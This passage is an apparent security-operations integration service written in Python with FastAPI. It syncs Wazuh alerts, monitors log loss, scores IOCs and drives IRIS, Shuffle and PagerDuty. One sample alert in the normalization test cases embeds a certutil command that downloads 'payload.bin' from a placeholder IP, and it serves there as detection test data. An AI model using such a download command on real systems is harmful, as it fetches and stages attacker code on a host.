import asyncio import logging import os import re import shlex import subprocess import uuid from collections import deque from datetime import datetime, timedelta, timezone from pathlib import Path from psycopg import sql from fastapi import Depends, FastAPI, File, HTTPException, Request, UploadFile import csv import io from fastapi.responses import FileResponse, Response, StreamingResponse from fastapi.staticfiles import StaticFiles from app.adapters.abuseipdb import AbuseIpdbAdapter from app.adapters.geoip import GeoIpAdapter from app.adapters.iris import IrisAdapter from app.adapters.pagerduty import PagerDutyAdapter from app.adapters.shuffle import ShuffleAdapter from app.adapters.virustotal import VirusTotalAdapter from app.adapters.wazuh import WazuhAdapter from app.config import settings from app.db import get_conn, init_schema from app.models import ( ActionCreateIncidentRequest, ApiResponse, CDetectionEvaluateRequest, IocEnrichRequest, IocEvaluateRequest, IrisAlertCreateRequest, IrisTicketCreateRequest, LogLossCheckRequest, LogLossStreamCheck, SimLogRunRequest, ShuffleLoginRequest, ShuffleProxyRequest, TriggerShuffleRequest, WazuhIngestRequest, ) from app.repositories.mvp_repo import MvpRepository from app.routes.mvp import build_mvp_router from app.security import require_internal_api_key from app.services.mvp_service import MvpService from app.services.c_detection_service import CDetectionService app = FastAPI(title=settings.app_name, version="0.1.0") logger = logging.getLogger(__name__) UI_DIR = Path(__file__).resolve().parent / "ui" UI_ASSETS_DIR = UI_DIR / "assets" SIM_SCRIPTS_DIR = Path("/app/scripts") SIM_RUN_LOGS_DIR = Path("/tmp/soc-integrator-sim-logs") wazuh_adapter = WazuhAdapter( base_url=settings.wazuh_base_url, username=settings.wazuh_username, password=settings.wazuh_password, indexer_url=settings.wazuh_indexer_url, indexer_username=settings.wazuh_indexer_username, indexer_password=settings.wazuh_indexer_password, ) shuffle_adapter = 
ShuffleAdapter( base_url=settings.shuffle_base_url, api_key=settings.shuffle_api_key, ) pagerduty_adapter = PagerDutyAdapter( base_url=settings.pagerduty_base_url, api_key=settings.pagerduty_api_key, ) iris_adapter = IrisAdapter( base_url=settings.iris_base_url, api_key=settings.iris_api_key, ) virustotal_adapter = VirusTotalAdapter( base_url=settings.virustotal_base_url, api_key=settings.virustotal_api_key, ) abuseipdb_adapter = AbuseIpdbAdapter( base_url=settings.abuseipdb_base_url, api_key=settings.abuseipdb_api_key, ) geoip_adapter = GeoIpAdapter( provider=settings.geoip_provider, cache_ttl_seconds=settings.geoip_cache_ttl_seconds, ) repo = MvpRepository() mvp_service = MvpService( repo=repo, wazuh_adapter=wazuh_adapter, shuffle_adapter=shuffle_adapter, iris_adapter=iris_adapter, pagerduty_adapter=pagerduty_adapter, ) c_detection_service = CDetectionService( repo=repo, geoip_adapter=geoip_adapter, ) app.include_router(build_mvp_router(mvp_service, require_internal_api_key)) app.mount("/ui/assets", StaticFiles(directory=str(UI_ASSETS_DIR)), name="ui-assets") @app.middleware("http") async def ui_no_cache_middleware(request: Request, call_next): response: Response = await call_next(request) if request.url.path == "/ui" or request.url.path.startswith("/ui/assets/"): response.headers["Cache-Control"] = "no-store, no-cache, must-revalidate, max-age=0" response.headers["Pragma"] = "no-cache" response.headers["Expires"] = "0" return response DEFAULT_LOG_LOSS_STREAMS: list[dict[str, object]] = [ { "name": "fortigate", "query": "full_log:fortigate OR full_log:FGT80F OR full_log:FGT60F OR full_log:FGT40F OR full_log:FGT501E", "min_count": 1, }, { "name": "windows_agent", "query": "full_log:windows_agent OR full_log:windows", "min_count": 1, }, { "name": "vmware", "query": "full_log:vmware", "min_count": 1, }, { "name": "log_monitor", "query": "full_log:log_monitor OR rule.id:100411", "min_count": 1, }, ] async def _execute_log_loss_check( req: LogLossCheckRequest, 
create_ticket: bool, ) -> dict[str, object]: minutes = max(1, int(req.minutes)) streams = req.streams or [LogLossStreamCheck(**item) for item in DEFAULT_LOG_LOSS_STREAMS] items: list[dict[str, object]] = [] loss_count = 0 error_count = 0 loss_stream_names: list[str] = [] for stream in streams: min_count = max(0, int(stream.min_count)) try: observed = await wazuh_adapter.count_alerts(query=stream.query, minutes=minutes) is_loss = observed < min_count if is_loss: loss_count += 1 loss_stream_names.append(stream.name) items.append( { "name": stream.name, "query": stream.query, "minutes": minutes, "min_count": min_count, "observed_count": observed, "status": "loss" if is_loss else "ok", } ) except Exception as exc: error_count += 1 items.append( { "name": stream.name, "query": stream.query, "minutes": minutes, "min_count": min_count, "observed_count": None, "status": "error", "error": str(exc), } ) summary = { "total_streams": len(items), "loss_streams": loss_count, "error_streams": error_count, "all_ok": loss_count == 0 and error_count == 0, } ticket_data: dict[str, object] | None = None if create_ticket and loss_count > 0: cooldown = max(0, int(settings.log_loss_monitor_ticket_cooldown_seconds)) now_ts = datetime.now(timezone.utc).timestamp() state = app.state.log_loss_monitor_state last_ticket_ts = float(state.get("last_ticket_ts", 0.0) or 0.0) in_cooldown = cooldown > 0 and (now_ts - last_ticket_ts) < cooldown if not in_cooldown: title = f"Log loss detected ({loss_count} stream(s))" description = ( f"Log-loss monitor detected missing telemetry in the last {minutes} minute(s). " f"Affected streams: {', '.join(loss_stream_names)}." 
) case_payload = { "case_name": title, "case_description": description, "case_customer": settings.iris_default_customer_id, "case_soc_id": settings.iris_default_soc_id, } try: iris_result = await iris_adapter.create_case(case_payload) state["last_ticket_ts"] = now_ts ticket_data = {"created": True, "iris": iris_result} except Exception as exc: ticket_data = {"created": False, "error": str(exc)} else: ticket_data = { "created": False, "skipped": "cooldown_active", "cooldown_seconds": cooldown, "last_ticket_ts": last_ticket_ts, } result: dict[str, object] = { "checked_at": datetime.now(timezone.utc).isoformat(), "minutes": minutes, "summary": summary, "streams": items, } if ticket_data is not None: result["ticket"] = ticket_data return result async def _log_loss_monitor_loop() -> None: interval = max(5, int(settings.log_loss_monitor_interval_seconds)) while True: started_at = datetime.now(timezone.utc).isoformat() try: app.state.log_loss_monitor_state["running"] = True app.state.log_loss_monitor_state["last_started_at"] = started_at req = LogLossCheckRequest(minutes=max(1, int(settings.log_loss_monitor_window_minutes))) result = await _execute_log_loss_check( req=req, create_ticket=bool(settings.log_loss_monitor_create_iris_ticket), ) app.state.log_loss_monitor_state["last_status"] = "ok" app.state.log_loss_monitor_state["last_result"] = result app.state.log_loss_monitor_state["last_finished_at"] = datetime.now(timezone.utc).isoformat() logger.info( "log-loss monitor checked=%s loss=%s errors=%s", result.get("summary", {}).get("total_streams", 0), result.get("summary", {}).get("loss_streams", 0), result.get("summary", {}).get("error_streams", 0), ) except Exception as exc: app.state.log_loss_monitor_state["last_status"] = "error" app.state.log_loss_monitor_state["last_error"] = str(exc) app.state.log_loss_monitor_state["last_finished_at"] = datetime.now(timezone.utc).isoformat() logger.exception("log-loss monitor failed: %s", exc) finally: 
app.state.log_loss_monitor_state["running"] = False await asyncio.sleep(interval) async def _wazuh_auto_sync_loop() -> None: interval = max(5, int(settings.wazuh_auto_sync_interval_seconds)) while True: started_at = datetime.now(timezone.utc).isoformat() try: app.state.wazuh_auto_sync_state["running"] = True app.state.wazuh_auto_sync_state["last_started_at"] = started_at result = await mvp_service.sync_wazuh_alerts( query=settings.wazuh_auto_sync_query, limit=settings.wazuh_auto_sync_limit, minutes=settings.wazuh_auto_sync_minutes, ) app.state.wazuh_auto_sync_state["last_status"] = "ok" app.state.wazuh_auto_sync_state["last_result"] = result app.state.wazuh_auto_sync_state["last_finished_at"] = datetime.now(timezone.utc).isoformat() logger.info( "wazuh auto-sync processed=%s ingested=%s skipped=%s failed=%s ioc_evaluated=%s ioc_matched=%s ioc_rejected=%s", result.get("processed", 0), result.get("ingested", 0), result.get("skipped_existing", 0), result.get("failed", 0), result.get("ioc_evaluated", 0), result.get("ioc_matched", 0), result.get("ioc_rejected", 0), ) except Exception as exc: app.state.wazuh_auto_sync_state["last_status"] = "error" app.state.wazuh_auto_sync_state["last_error"] = str(exc) app.state.wazuh_auto_sync_state["last_finished_at"] = datetime.now(timezone.utc).isoformat() logger.exception("wazuh auto-sync failed: %s", exc) finally: app.state.wazuh_auto_sync_state["running"] = False await asyncio.sleep(interval) def _c_match_to_incident_event(match: dict[str, object]) -> dict[str, object]: event = dict(match.get("event") or {}) usecase_id = str(match.get("usecase_id") or "C-unknown") section = str(match.get("section") or "c") severity = str(match.get("severity") or "medium") entity = str(match.get("entity") or "unknown") evidence = dict(match.get("evidence") or {}) source = str(event.get("source") or "wazuh") timestamp = str(event.get("timestamp") or datetime.now(timezone.utc).isoformat()) event_id = str(event.get("event_id") or 
f"{usecase_id}-{int(datetime.now(timezone.utc).timestamp())}") payload = dict(event.get("payload") or {}) asset = dict(event.get("asset") or {}) network = dict(event.get("network") or {}) event_type = "c2_credential_abuse" if section == "c1": event_type = "c1_impossible_travel" elif section == "c3": event_type = "c3_lateral_movement" title = f"{usecase_id} detection for {entity}" description = f"{usecase_id} matched for entity={entity}. evidence={evidence}" tags = list(event.get("tags") or []) tags.extend(["appendix_c", usecase_id.lower(), section]) return { "source": source, "event_type": event_type, "event_id": event_id, "timestamp": timestamp, "severity": severity, "title": title, "description": description, "asset": asset, "network": network, "tags": sorted(set(tags)), "risk_context": {"appendix_c_usecase": usecase_id}, "raw": event.get("raw") or {}, "payload": payload, } @app.on_event("startup") async def startup() -> None: init_schema() repo.ensure_policy() app.state.wazuh_auto_sync_state = { "running": False, "last_status": None, "last_started_at": None, "last_finished_at": None, "last_error": None, "last_result": None, } app.state.log_loss_monitor_state = { "running": False, "last_status": None, "last_started_at": None, "last_finished_at": None, "last_error": None, "last_result": None, "last_ticket_ts": 0.0, } app.state.c_detection_state = { "last_status": None, "last_started_at": None, "last_finished_at": None, "last_error": None, "last_result": None, "last_ticket_ts_by_key": {}, } app.state.systems_monitor_state = { "last_ok_at": {}, } app.state.sim_runs = {} SIM_RUN_LOGS_DIR.mkdir(parents=True, exist_ok=True) if settings.wazuh_auto_sync_enabled: app.state.wazuh_auto_sync_task = asyncio.create_task(_wazuh_auto_sync_loop()) logger.info( "wazuh auto-sync enabled interval=%ss limit=%s minutes=%s query=%s", settings.wazuh_auto_sync_interval_seconds, settings.wazuh_auto_sync_limit, settings.wazuh_auto_sync_minutes, settings.wazuh_auto_sync_query, ) if 
settings.log_loss_monitor_enabled: app.state.log_loss_monitor_task = asyncio.create_task(_log_loss_monitor_loop()) logger.info( "log-loss monitor enabled interval=%ss window=%sm create_iris_ticket=%s cooldown=%ss", settings.log_loss_monitor_interval_seconds, settings.log_loss_monitor_window_minutes, settings.log_loss_monitor_create_iris_ticket, settings.log_loss_monitor_ticket_cooldown_seconds, ) @app.on_event("shutdown") async def shutdown() -> None: task = getattr(app.state, "wazuh_auto_sync_task", None) if task: task.cancel() try: await task except asyncio.CancelledError: pass ll_task = getattr(app.state, "log_loss_monitor_task", None) if ll_task: ll_task.cancel() try: await ll_task except asyncio.CancelledError: pass sim_runs = getattr(app.state, "sim_runs", {}) for run in sim_runs.values(): process = run.get("process") if process and process.poll() is None: process.terminate() @app.get( "/ui", summary="SOC Integrator UI", description="Serve the built-in Alpine.js operations console.", include_in_schema=False, ) async def ui_index() -> FileResponse: if not UI_DIR.exists(): raise HTTPException(status_code=404, detail="UI is not available in this build") return FileResponse(UI_DIR / "index.html") @app.get( "/health", response_model=ApiResponse, summary="Service health", description="Return soc-integrator service identity and configured upstream targets.", ) async def health() -> ApiResponse: return ApiResponse( data={ "service": settings.app_name, "env": settings.app_env, "targets": { "wazuh": settings.wazuh_base_url, "shuffle": settings.shuffle_base_url, "pagerduty": settings.pagerduty_base_url, "iris": settings.iris_base_url, }, } ) def _build_wazuh_hit_from_ingest(payload: WazuhIngestRequest) -> dict[str, object]: src_payload = dict(payload.payload or {}) src_payload.setdefault("@timestamp", datetime.now(timezone.utc).isoformat()) src_payload.setdefault("id", payload.alert_id) src_payload.setdefault( "rule", { "id": payload.rule_id or "unknown", "level": 
payload.severity if payload.severity is not None else 5, "description": payload.title or "Wazuh alert", }, ) return {"_id": payload.alert_id or f"wazuh-{uuid.uuid4().hex[:12]}", "_source": src_payload} def _normalize_wazuh_ingest_payload(payload: WazuhIngestRequest) -> dict[str, object]: normalized = { "source": payload.source, "alert_id": payload.alert_id, "rule_id": payload.rule_id, "severity": payload.severity, "title": payload.title, "payload": payload.payload, } hit = _build_wazuh_hit_from_ingest(payload) normalized_event = mvp_service.normalize_wazuh_hit(hit) return { "normalized": normalized, "normalized_event": normalized_event, } @app.post( "/ingest/wazuh-alert", response_model=ApiResponse, summary="Normalize Wazuh alert", description="Normalize a raw Wazuh alert payload into both legacy ingest shape and SOC normalized event shape.", ) async def ingest_wazuh_alert(payload: WazuhIngestRequest) -> ApiResponse: return ApiResponse(data=_normalize_wazuh_ingest_payload(payload)) @app.get( "/ingest/wazuh-alert/samples", response_model=ApiResponse, summary="Sample normalization cases", description="Return sample Wazuh event-log cases with expected normalized output for testing and integration.", ) async def ingest_wazuh_alert_samples() -> ApiResponse: sample_payloads = [ WazuhIngestRequest( source="wazuh", rule_id="110302", alert_id="sample-a1-02", severity=8, title="A1 production: DNS IOC domain match event", payload={ "@timestamp": datetime.now(timezone.utc).isoformat(), "full_log": "Mar 04 09:42:24 dns-fw-01 soc_mvp_test=true source=dns severity=medium event_type=ioc_domain_match src_ip=10.12.132.85 ioc_type=domain ioc_value=ioc-2080.malicious.example feed=threatintel_main confidence=high action=alert", "agent": {"name": "dns-fw-01", "id": "001"}, }, ), WazuhIngestRequest( source="wazuh", rule_id="110402", alert_id="sample-b1-02", severity=8, title="B1 production: ESXi SSH enabled", payload={ "@timestamp": datetime.now(timezone.utc).isoformat(), "full_log": 
"Mar 04 09:42:28 esxi-01 soc_mvp_test=true source=vmware severity=medium event_type=vmware_esxi_enable_ssh action=enable service=ssh user=root host=esxi-01 src_ip=203.0.113.115", "agent": {"name": "esxi-01", "id": "002"}, }, ), WazuhIngestRequest( source="wazuh", rule_id="110426", alert_id="sample-b3-06", severity=8, title="B3 production: CertUtil download pattern", payload={ "@timestamp": datetime.now(timezone.utc).isoformat(), "full_log": "Mar 04 09:42:35 win-sysmon-01 soc_mvp_test=true source=windows_sysmon severity=medium event_type=sysmon_certutil_download event_id=1 process=certutil.exe cmdline=\"certutil -urlcache -split -f http://198.51.100.22/payload.bin payload.bin\" src_ip=10.10.10.5", "agent": {"name": "win-sysmon-01", "id": "003"}, }, ), WazuhIngestRequest( source="wazuh", rule_id="110501", alert_id="sample-c1-01", severity=12, title="C1 production: Impossible travel", payload={ "@timestamp": datetime.now(timezone.utc).isoformat(), "full_log": "Mar 04 09:44:10 fgt-vpn-01 source=vpn severity=high event_type=vpn_login_success event_id=4624 success=true user=alice.admin src_ip=8.8.8.8 country=US src_lat=37.3861 src_lon=-122.0839 dst_host=vpn-gw-01", "agent": {"name": "fgt-vpn-01", "id": "004"}, }, ), ] cases = [] for item in sample_payloads: cases.append( { "name": str(item.alert_id), "request": item.model_dump(mode="json"), "result": _normalize_wazuh_ingest_payload(item), } ) return ApiResponse(data={"cases": cases, "count": len(cases)}) @app.post( "/action/create-incident", response_model=ApiResponse, summary="Create PagerDuty incident", description="Create an incident in PagerDuty (stub or real integration) from request payload.", ) async def create_incident(payload: ActionCreateIncidentRequest) -> ApiResponse: incident_payload = { "title": payload.title, "urgency": payload.severity, "incident_key": payload.dedupe_key, "body": payload.payload, "source": payload.source, } try: pd_result = await pagerduty_adapter.create_incident(incident_payload) except 
Exception as exc: raise HTTPException(status_code=502, detail=f"PagerDuty call failed: {exc}") from exc return ApiResponse(data={"pagerduty": pd_result}) @app.post( "/action/trigger-shuffle", response_model=ApiResponse, summary="Trigger Shuffle workflow", description="Execute a Shuffle workflow by ID with execution_argument payload.", ) async def trigger_shuffle(payload: TriggerShuffleRequest) -> ApiResponse: try: shuffle_result = await shuffle_adapter.trigger_workflow( workflow_id=payload.workflow_id, payload=payload.execution_argument, ) except Exception as exc: raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc return ApiResponse(data={"shuffle": shuffle_result}) @app.get( "/shuffle/health", response_model=ApiResponse, summary="Shuffle health", description="Check Shuffle backend health endpoint through adapter connectivity.", ) async def shuffle_health() -> ApiResponse: try: result = await shuffle_adapter.health() except Exception as exc: raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc return ApiResponse(data={"shuffle": result}) @app.get( "/shuffle/auth-test", response_model=ApiResponse, summary="Shuffle auth test", description="Validate Shuffle API key authentication.", ) async def shuffle_auth_test() -> ApiResponse: try: result = await shuffle_adapter.auth_test() except Exception as exc: raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc return ApiResponse(data={"shuffle": result}) @app.post( "/shuffle/login", response_model=ApiResponse, summary="Shuffle login", description="Login to Shuffle with username/password and return auth response.", ) async def shuffle_login(payload: ShuffleLoginRequest) -> ApiResponse: try: result = await shuffle_adapter.login(payload.username, payload.password) except Exception as exc: raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc return ApiResponse(data={"shuffle": result}) @app.post( 
"/shuffle/generate-apikey", response_model=ApiResponse, summary="Generate Shuffle API key", description="Login using provided or configured credentials and generate a Shuffle API key.", ) async def shuffle_generate_apikey(payload: ShuffleLoginRequest | None = None) -> ApiResponse: username = payload.username if payload else settings.shuffle_username password = payload.password if payload else settings.shuffle_password if not username or not password: raise HTTPException( status_code=400, detail="Missing shuffle credentials. Provide username/password in body or set SHUFFLE_USERNAME and SHUFFLE_PASSWORD.", ) try: result = await shuffle_adapter.generate_apikey_from_login(username, password) except Exception as exc: raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc return ApiResponse(data={"shuffle": result}) @app.get( "/shuffle/workflows", response_model=ApiResponse, summary="List Shuffle workflows", description="List available workflows in Shuffle using configured API key.", ) async def shuffle_workflows() -> ApiResponse: try: result = await shuffle_adapter.list_workflows() except Exception as exc: raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc return ApiResponse(data={"shuffle": result}) @app.get( "/shuffle/workflows/{workflow_id}", response_model=ApiResponse, summary="Get Shuffle workflow", description="Get a single Shuffle workflow definition by workflow ID.", ) async def shuffle_workflow(workflow_id: str) -> ApiResponse: try: result = await shuffle_adapter.get_workflow(workflow_id) except Exception as exc: raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc return ApiResponse(data={"shuffle": result}) @app.post( "/shuffle/workflows/{workflow_id}/execute", response_model=ApiResponse, summary="Execute Shuffle workflow", description="Execute a specific Shuffle workflow with custom JSON payload.", ) async def shuffle_workflow_execute( workflow_id: str, payload: 
dict[str, object] ) -> ApiResponse: try: result = await shuffle_adapter.trigger_workflow(workflow_id=workflow_id, payload=payload) except Exception as exc: raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc return ApiResponse(data={"shuffle": result}) @app.get( "/shuffle/apps", response_model=ApiResponse, summary="List Shuffle apps", description="List installed/available Shuffle apps from app API.", ) async def shuffle_apps() -> ApiResponse: try: result = await shuffle_adapter.list_apps() except Exception as exc: raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc return ApiResponse(data={"shuffle": result}) @app.post( "/shuffle/proxy", response_model=ApiResponse, summary="Proxy request to Shuffle API", description="Forward arbitrary HTTP request to Shuffle API path via configured credentials.", ) async def shuffle_proxy(payload: ShuffleProxyRequest) -> ApiResponse: path = payload.path if payload.path.startswith("/api/") else f"/api/v1/{payload.path.lstrip('/')}" try: result = await shuffle_adapter.proxy( method=payload.method, path=path, params=payload.params, payload=payload.payload, ) except Exception as exc: raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc return ApiResponse(data={"shuffle": result}) @app.post( "/action/create-iris-case", response_model=ApiResponse, summary="Create IRIS case (action)", description="Create an IRIS case using action payload fields and defaults.", ) async def create_iris_case(payload: ActionCreateIncidentRequest) -> ApiResponse: # IRIS v2 expects case_name, case_description, case_customer, case_soc_id. 
case_payload = { "case_name": payload.title, "case_description": payload.payload.get("description", "Created by soc-integrator"), "case_customer": payload.payload.get("case_customer", settings.iris_default_customer_id), "case_soc_id": payload.payload.get("case_soc_id", settings.iris_default_soc_id), } try: iris_result = await iris_adapter.create_case(case_payload) except Exception as exc: raise HTTPException(status_code=502, detail=f"IRIS call failed: {exc}") from exc return ApiResponse(data={"iris": iris_result}) @app.post( "/iris/tickets", response_model=ApiResponse, summary="Create IRIS ticket", description="Create an IRIS case/ticket directly using ticket request model.", ) async def iris_create_ticket(payload: IrisTicketCreateRequest) -> ApiResponse: case_payload = { "case_name": payload.title, "case_description": payload.description, "case_customer": payload.case_customer or settings.iris_default_customer_id, "case_soc_id": payload.case_soc_id or settings.iris_default_soc_id, } if payload.payload: case_payload.update(payload.payload) try: iris_result = await iris_adapter.create_case(case_payload) except Exception as exc: raise HTTPException(status_code=502, detail=f"IRIS call failed: {exc}") from exc return ApiResponse(data={"iris": iris_result}) @app.get( "/iris/tickets", response_model=ApiResponse, summary="List IRIS tickets", description="List IRIS cases with pagination, using v2 or legacy fallback endpoint.", ) async def iris_list_tickets(limit: int = 50, offset: int = 0) -> ApiResponse: try: iris_result = await iris_adapter.list_cases(limit=limit, offset=offset) except Exception as exc: raise HTTPException(status_code=502, detail=f"IRIS call failed: {exc}") from exc return ApiResponse(data={"iris": iris_result}) def _build_vt_ioc_result( vt: dict[str, object], ioc_type: str, ioc_value: str, malicious_threshold: int, suspicious_threshold: int, ) -> tuple[dict[str, object], bool, str, float]: stats = ( (((vt.get("data") or {}).get("attributes") or 
{}).get("last_analysis_stats")) if isinstance(vt, dict) else None ) or {} malicious = int(stats.get("malicious", 0) or 0) suspicious = int(stats.get("suspicious", 0) or 0) harmless = int(stats.get("harmless", 0) or 0) undetected = int(stats.get("undetected", 0) or 0) total = malicious + suspicious + harmless + undetected confidence = 0.0 if total == 0 else round(((malicious + (0.5 * suspicious)) / total), 4) matched = (malicious >= malicious_threshold) or (suspicious >= suspicious_threshold) severity = "low" if malicious >= 5 or suspicious >= 10: severity = "critical" elif malicious >= 2 or suspicious >= 5: severity = "high" elif malicious >= 1 or suspicious >= 1: severity = "medium" reason = ( f"virustotal_stats malicious={malicious} suspicious={suspicious} " f"thresholds(malicious>={malicious_threshold}, suspicious>={suspicious_threshold})" ) result: dict[str, object] = { "ioc_type": ioc_type, "ioc_value": ioc_value, "matched": matched, "severity": severity, "confidence": confidence, "reason": reason, "providers": { "virustotal": { "stats": stats, } }, "raw": { "virustotal": vt, }, } return result, matched, severity, confidence def _build_abuseipdb_ioc_result( abuse: dict[str, object], ioc_value: str, confidence_threshold: int = 50, ) -> tuple[dict[str, object], bool, str, float]: data = ((abuse.get("data") if isinstance(abuse, dict) else None) or {}) if isinstance(abuse, dict) else {} score = int(data.get("abuseConfidenceScore", 0) or 0) total_reports = int(data.get("totalReports", 0) or 0) matched = score >= confidence_threshold severity = "low" if score >= 90: severity = "critical" elif score >= 70: severity = "high" elif score >= 30: severity = "medium" confidence = round(score / 100.0, 4) reason = f"abuseipdb score={score} totalReports={total_reports} threshold>={confidence_threshold}" result: dict[str, object] = { "ioc_type": "ip", "ioc_value": ioc_value, "matched": matched, "severity": severity, "confidence": confidence, "reason": reason, "providers": 
{"abuseipdb": {"score": score, "totalReports": total_reports, "raw": abuse}}, } return result, matched, severity, confidence def _extract_first_array(payload: object) -> list[object]: if isinstance(payload, list): return payload if not isinstance(payload, dict): return [] preferred_keys = [ "items", "results", "workflows", "apps", "affected_items", "data", ] for key in preferred_keys: value = payload.get(key) if isinstance(value, list): return value for value in payload.values(): extracted = _extract_first_array(value) if extracted: return extracted return [] SIM_SCRIPT_MAP: dict[str, str] = { "fortigate": "send-wazuh-fortigate-test-events.sh", "endpoint": "send-wazuh-endpoint-agent-test-events.sh", "cisco": "send-wazuh-cisco-test-events.sh", "proposal_required": "send-wazuh-proposal-required-events.sh", "proposal_appendix_b": "send-wazuh-proposal-appendix-b-events.sh", "proposal_appendix_c": "send-wazuh-proposal-appendix-c-events.sh", "wazuh_test": "send-wazuh-test-events.sh", } def _build_sim_command(payload: SimLogRunRequest) -> list[str]: script_name = SIM_SCRIPT_MAP[payload.script] script_path = SIM_SCRIPTS_DIR / script_name count = max(1, int(payload.count)) delay = max(0.0, float(payload.delay_seconds)) if payload.script == "endpoint": cmd = [ "/bin/bash", str(script_path), payload.target or "all", payload.scenario or "all", str(count), str(delay), ] else: cmd = [ "/bin/bash", str(script_path), payload.target or "all", str(count), str(delay), ] if payload.forever: cmd.append("--forever") return cmd def _serialize_sim_run(run_id: str, run: dict[str, object]) -> dict[str, object]: process = run.get("process") poll_code = process.poll() if process else None return_code = run.get("return_code") if poll_code is not None and return_code is None: run["return_code"] = poll_code return_code = poll_code return { "run_id": run_id, "script": run.get("script"), "target": run.get("target"), "scenario": run.get("scenario"), "count": run.get("count"), "delay_seconds": 
run.get("delay_seconds"), "forever": run.get("forever"), "pid": run.get("pid"), "cmd": run.get("cmd"), "started_at": run.get("started_at"), "stopped_at": run.get("stopped_at"), "running": bool(process and process.poll() is None), "return_code": return_code, "log_file": run.get("log_file"), } def _tail_log_lines(path: Path, limit: int = 200) -> list[str]: line_limit = max(1, min(int(limit), 1000)) lines: deque[str] = deque(maxlen=line_limit) try: with path.open("r", encoding="utf-8", errors="replace") as handle: for line in handle: lines.append(line.rstrip("\n")) except FileNotFoundError: return [] return list(lines) def _safe_query_token(value: object) -> str | None: text = str(value or "").strip() if not text: return None if not re.fullmatch(r"[A-Za-z0-9_.:-]+", text): return None return text def _parse_iso_datetime(value: object) -> datetime | None: text = str(value or "").strip() if not text: return None if text.endswith("Z"): text = text[:-1] + "+00:00" try: parsed = datetime.fromisoformat(text) except ValueError: return None if parsed.tzinfo is None: parsed = parsed.replace(tzinfo=timezone.utc) return parsed.astimezone(timezone.utc) def _sim_wazuh_query_clauses(run: dict[str, object]) -> list[str]: script = str(run.get("script") or "").strip().lower() target = str(run.get("target") or "all").strip() scenario = str(run.get("scenario") or "all").strip().lower() target_token = _safe_query_token(target) _ = scenario clauses: list[str] = ["(full_log:*soc_mvp_test=true* OR data.soc_mvp_test:true)"] if script == "fortigate": clauses.append( "(full_log:*fortigate* OR full_log:*FGT80F* OR full_log:*FGT60F* OR full_log:*FGT40F* " "OR full_log:*FGT501E* OR data.vendor:fortinet OR data.product:fortigate OR data.source:fortigate)" ) if target_token and target_token.lower() != "all": clauses.append(f"(full_log:*{target_token}* OR data.model:{target_token})") elif script == "endpoint": if target_token and target_token.lower() != "all": lowered = target_token.lower() if 
lowered in {"windows", "win"}: clauses.append( "(full_log:*source=windows* OR full_log:*source=windows_agent* " "OR data.source:windows OR data.source:windows_agent OR data.platform:windows)" ) elif lowered in {"mac", "macos"}: clauses.append( "(full_log:*source=mac* OR full_log:*source=mac_agent* " "OR data.source:mac OR data.source:mac_agent OR data.platform:mac)" ) elif lowered == "linux": clauses.append( "(full_log:*source=linux* OR full_log:*source=linux_agent* " "OR data.source:linux OR data.source:linux_agent OR data.platform:linux)" ) else: clauses.append(f"full_log:*{target_token}*") else: clauses.append( "(full_log:*source=windows* OR full_log:*source=windows_agent* " "OR full_log:*source=mac* OR full_log:*source=mac_agent* " "OR full_log:*source=linux* OR full_log:*source=linux_agent* " "OR data.source:windows OR data.source:windows_agent " "OR data.source:mac OR data.source:mac_agent " "OR data.source:linux OR data.source:linux_agent)" ) elif script == "cisco": clauses.append("(full_log:*cisco* OR data.vendor:cisco)") if target_token and target_token.lower() != "all": clauses.append(f"full_log:*{target_token}*") elif script in {"proposal_required", "proposal_appendix_b", "proposal_appendix_c", "wazuh_test"}: clauses.append("(full_log:*soc_mvp_test=true* OR data.soc_mvp_test:true)") if target_token and target_token.lower() != "all": clauses.append(f"full_log:*{target_token}*") else: clauses.append("full_log:*soc_mvp_test=true*") return clauses def _extract_wazuh_hits(payload: object) -> list[dict[str, object]]: if not isinstance(payload, dict): return [] hits_root = payload.get("hits") if not isinstance(hits_root, dict): return [] hits = hits_root.get("hits") if not isinstance(hits, list): return [] result: list[dict[str, object]] = [] for hit in hits: if isinstance(hit, dict): result.append(hit) return result def _extract_wazuh_event_item(hit: dict[str, object], include_raw: bool) -> dict[str, object]: source = hit.get("_source") if 
isinstance(hit.get("_source"), dict) else {} source = source if isinstance(source, dict) else {} agent = source.get("agent") if isinstance(source.get("agent"), dict) else {} agent = agent if isinstance(agent, dict) else {} decoder = source.get("decoder") if isinstance(source.get("decoder"), dict) else {} decoder = decoder if isinstance(decoder, dict) else {} data = source.get("data") if isinstance(source.get("data"), dict) else {} data = data if isinstance(data, dict) else {} rule = source.get("rule") if isinstance(source.get("rule"), dict) else {} rule = rule if isinstance(rule, dict) else {} item: dict[str, object] = { "@timestamp": source.get("@timestamp") or source.get("timestamp"), "event_id": data.get("event_id") or source.get("id") or hit.get("_id"), "agent_name": agent.get("name"), "agent_id": agent.get("id"), "decoder_name": decoder.get("name"), "source": data.get("source"), "event_type": data.get("event_type"), "severity": data.get("severity"), "rule_id": rule.get("id"), "rule_description": rule.get("description"), "full_log": source.get("full_log"), } if include_raw: item["raw"] = source return item def _extract_wazuh_rule_item(hit: dict[str, object], include_raw: bool) -> dict[str, object] | None: source = hit.get("_source") if isinstance(hit.get("_source"), dict) else {} source = source if isinstance(source, dict) else {} rule = source.get("rule") if isinstance(source.get("rule"), dict) else {} rule = rule if isinstance(rule, dict) else {} rule_id = rule.get("id") if rule_id in {None, ""}: return None agent = source.get("agent") if isinstance(source.get("agent"), dict) else {} agent = agent if isinstance(agent, dict) else {} data = source.get("data") if isinstance(source.get("data"), dict) else {} data = data if isinstance(data, dict) else {} item: dict[str, object] = { "@timestamp": source.get("@timestamp") or source.get("timestamp"), "rule_id": rule_id, "rule_level": rule.get("level"), "rule_description": rule.get("description"), "rule_firedtimes": 
